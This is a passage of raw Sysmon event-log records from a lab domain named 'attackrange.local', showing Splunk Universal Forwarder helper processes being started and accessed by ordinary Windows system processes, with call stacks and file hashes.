Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033014Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-3742-6013-8503-00000000A401}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033038Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3745-6013-8703-00000000A401}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033037Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033036Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033035Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033034Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033033Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26B4-6013-0500-00000000A401}6442212C:\Windows\system32\csrss.exe{FF16AF91-3745-6013-8703-00000000A401}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033032Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.365{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3745-6013-8703-00000000A401}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033031Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:29.366{FF16AF91-3745-6013-8703-00000000A401}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362552Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3746-6013-c403-000000001100}10816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362551Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362550Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362549Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362548Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362547Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-3746-6013-c403-000000001100}10816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362546Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.987{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3746-6013-c403-000000001100}10816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362545Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.988{8e433fbf-3746-6013-c403-000000001100}10816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362544Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3746-6013-c303-000000001100}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362543Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362542Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362541Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362540Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362539Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-3746-6013-c303-000000001100}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362538Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.315{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3746-6013-c303-000000001100}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362537Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:30.316{8e433fbf-3746-6013-c303-000000001100}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033047Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.178{FF16AF91-3746-6013-8803-00000000A401}57206496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033046Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:30.037{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3746-6013-8803-00000000A401}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033045Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 